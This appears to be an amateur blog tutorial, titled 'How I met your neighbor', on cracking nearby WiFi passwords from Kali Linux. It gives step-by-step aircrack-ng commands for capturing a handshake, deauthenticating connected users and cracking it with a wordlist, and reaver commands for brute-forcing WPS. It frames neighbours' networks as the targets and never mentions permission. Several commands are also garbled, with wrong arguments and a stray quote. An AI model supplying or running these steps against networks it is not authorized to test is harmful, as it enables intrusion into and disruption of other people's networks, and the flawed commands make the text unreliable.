How I met your neighbor!!!!

There are 2 ways to hack an wireless network both of them require mon0 (monitoring mode) if you are not associated and authenticated to the network(connected).

Things that you might need:-

  1. Kali Linux on Vmware.
  2. Dlink dw-123.(or any other wireless card that supports monitoring mode)
Dictionary attack:- 
dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary.


How to?

  1. Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
  2.  Now type airodump-ng mon0 and hit enter to get the list of networks in your range.
  3. Now type airodump-ng --bssid target’s bssid -c channel number --write filename mon0 and hit enter to capture the packets of the target router.
  4. Now on a new terminal window type aireplay-ng -0 5 --ignore-negative-one -a essid  -c cleint essid mon0 to kick the user out and make him to authenticate himself once again which gives us an authentication frame.
  5. Now press Ctrl+c to stop the first terminal or close both terminals.
  6. Now type aircrack-ng -w path to wordlist” filename.cap and hit enter to crack the hash.

Limitations:-

If you don't have the word in the word-list than you cannot hack the password.

Brute force attack:-
Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.

How to?
  1. Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
  2.  Now type airodump-ng mon0 to get the list of networks in your range.
  3. Now to deploy reaver you will need to type reaver -i mon0  -b bssid -vv and hit enter, after a few minutes or hours you will get the wps key wpa key of the router.
Limitation:-
It takes a lot of time to crack the password and requires a stable traffic of the network.



Monitoring mode(mon0)

Introduction:-
Wireless cards have 6 different modes each with it's own functionality:-
  1. Managed (Client) 
  2. Master (router)
  3. Ad-hoc (peer to peer)
  4. Mesh (planned ad-hoc)
  5. Repeater (WI-FI extender)
  6. Monitor 
Monitor mode is a special mode available in some of the wireless cards that allows you to sniff packets which are being sent form the router to the client even when you are not associated and authenticated to the network. You can also use it to authenticate the user who is associated and authenticated to the network. In other words it is like spying on all the networks in your range.
  
How to check your card? 
Open a terminal and type iw phy phy0 info | grep -A8 modes and hit enter. Here phy0 can be replaced with phy1,phy2,phy3,etc depending on your system.To find out this type airmon-ng and hit enter in the terminal.

How to switch it on?
 To enable monitor mode type ifconfig and hit enter on your terminal. It will give you a list of your interfaces list down the wireless interface name in our case it was wlan0. Now type airmon-ng start wlan0 and hit enter to start the monitor mode on your wireless card.

Is it working?
To check if the mon0 interface is working or not type tshark-i mon0 and hit enter.

What is it's use?
This mode is required for all sorts of WI-FI  hacking and sniffing.

Note:-
In our tests and hacks we are using a dlink dw-123 WIFI dongle.